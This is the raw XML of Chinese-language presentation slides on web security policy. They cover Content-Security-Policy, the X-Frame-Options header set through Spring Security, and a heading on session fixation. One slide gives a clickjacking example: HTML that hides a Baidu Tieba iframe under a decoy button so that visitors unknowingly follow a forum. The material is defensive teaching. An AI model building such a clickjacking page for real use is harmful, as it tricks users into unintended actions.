                <a:t>)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</a:rPr>
                <a:t>。比如：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>1.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>只允许本站资源 配置为：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Content-Security-Policy</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>： </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>default-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t> ‘self’</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Spring Security </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>配置实例如下：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p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zh-CN" altLang="en-US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229" y="2543983"/>
            <a:ext cx="2764216" cy="25221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228" y="3080074"/>
            <a:ext cx="5104762" cy="16140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1463" y="5457118"/>
            <a:ext cx="7747935" cy="124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515781"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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53143" y="551543"/>
            <a:ext cx="4238172" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4238172" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373258" y="1124504"/>
              <a:ext cx="3149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Web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean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安全策略</a:t>
              </a:r>
              <a:endPara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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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2</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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xmlns="" id="{AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="218547" y="1205391"/>
            <a:ext cx="5210628" cy="3954929"/>
            <a:chOff x="7478783" y="1890258"/>
            <a:chExt cx="5210628" cy="3954929"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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54983" y="1890258"/>
              <a:ext cx="5134428" cy="661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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>X-Frame-Options </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>响应头</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478783" y="2551978"/>
              <a:ext cx="4934024" cy="32932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cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>X-Frame-Options HTTP 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响应头是用来给浏览器指示允许一个页面可否在 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  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>&lt;frame&gt;, &lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>iframe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  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>&gt; 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或者 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  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>&lt;object&gt; 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中展现的标记。网站可以使用此功能，来确保自己网站的内容没有被嵌到别人的网站中去，也从而避免了点击劫持 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(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="16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ClickJacking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  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>) 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的攻击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。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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6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r>
                <a:rPr lang="zh-CN" altLang="en-US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使用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X-Frame-Options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，有三个值：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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DENY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：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表示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该页面不允许在 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frame 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中展示，即便是在相同域名的页面中嵌套也不允许。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:tabLst>
                  <a:tab pos="3773488" algn="l"/>
                </a:tabLst>
              </a:pPr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SAMEORIGIN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：表示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该页面可以在相同域名页面的 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  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>frame 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中展示。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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>
                <a:tabLst>
                  <a:tab pos="3773488" algn="l"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>ALLOW-FROM </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="16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uri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：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表示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该页面可以在指定来源的 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  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>frame 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中展示。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN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AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5152571" y="1223248"/>
            <a:ext cx="6900562" cy="4693593"/>
            <a:chOff x="7478782" y="1890258"/>
            <a:chExt cx="4985657" cy="4693593"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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54984" y="1890258"/>
              <a:ext cx="4540536" cy="661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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>点击挟持攻击示例</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478782" y="2551978"/>
              <a:ext cx="4985657" cy="40318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点击劫持是一种视觉上的欺骗手段，攻击者使用一个透明的、不可见的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>iframe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，覆盖在一个网页上，然后诱使用户在该网页上进行操作，此时用户在不知情的情况下点击了透明的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>iframe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页面。通过调整</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>iframe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页面的位置，可以诱使用户恰好点击在</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>iframe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页面的一些功能性按钮上，攻击者常常配合社工手段完成攻击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。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p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比如：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p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假如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我们在百度有个贴吧，想偷偷让别人关注它。于是我们准备一个页面，内容包含：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>&lt;body&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>	</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>那些不能说的秘密 </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>	&lt;button&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>查看详情</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>&lt;/button&gt; </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>&lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>iframe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>="http://tieba.baidu.com/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>f?kw</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>=%C3%C0%C5%AE"&gt;&lt;/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>iframe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>&gt; &lt;/body&gt;</a:t>
              </a:r>
            </a:p>
            <a:p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放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到你的网站上，但有用户点击了查看详情按钮后，其实就点击到了关注该贴吧。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs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9855448"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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53143" y="551543"/>
            <a:ext cx="4238172" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4238172" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373258" y="1124504"/>
              <a:ext cx="3149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Web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean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安全策略</a:t>
              </a:r>
              <a:endPara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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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2</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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xmlns="" id="{AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1023257" y="1183267"/>
            <a:ext cx="11023600" cy="4080224"/>
            <a:chOff x="7478783" y="1890258"/>
            <a:chExt cx="4616735" cy="3632947"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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54983" y="1890258"/>
              <a:ext cx="4540535" cy="1052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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Spring Security </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>配置</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>X-Frame-Options </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>响应头</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478783" y="2371770"/>
              <a:ext cx="4324636" cy="31514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使用</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>X-Frame-Options HTTP </a:t>
              </a:r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响应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头避免点击挟持攻击，示例如下：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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r>
                <a:rPr lang="en-US" altLang="zh-CN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Spring Security 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配置 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>X-Frame-Options HTTP </a:t>
              </a:r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响应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头，示例如下：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p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zh-CN" altLang="en-US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715" y="2149002"/>
            <a:ext cx="2904762" cy="51428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715" y="3190828"/>
            <a:ext cx="5095238" cy="2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980"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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53143" y="551543"/>
            <a:ext cx="4238172" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4238172" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373258" y="1124504"/>
              <a:ext cx="3149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Web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean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安全策略</a:t>
              </a:r>
              <a:endPara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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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2</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="218547" y="1205391"/>
            <a:ext cx="5210628" cy="2231380"/>
            <a:chOff x="7478783" y="1890258"/>
            <a:chExt cx="5210628" cy="2231380"/>
          </a:xfrm>
        </p:grpSpPr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xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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54983" y="1890258"/>
              <a:ext cx="5134428" cy="5662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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Session </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Fixation Attack</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
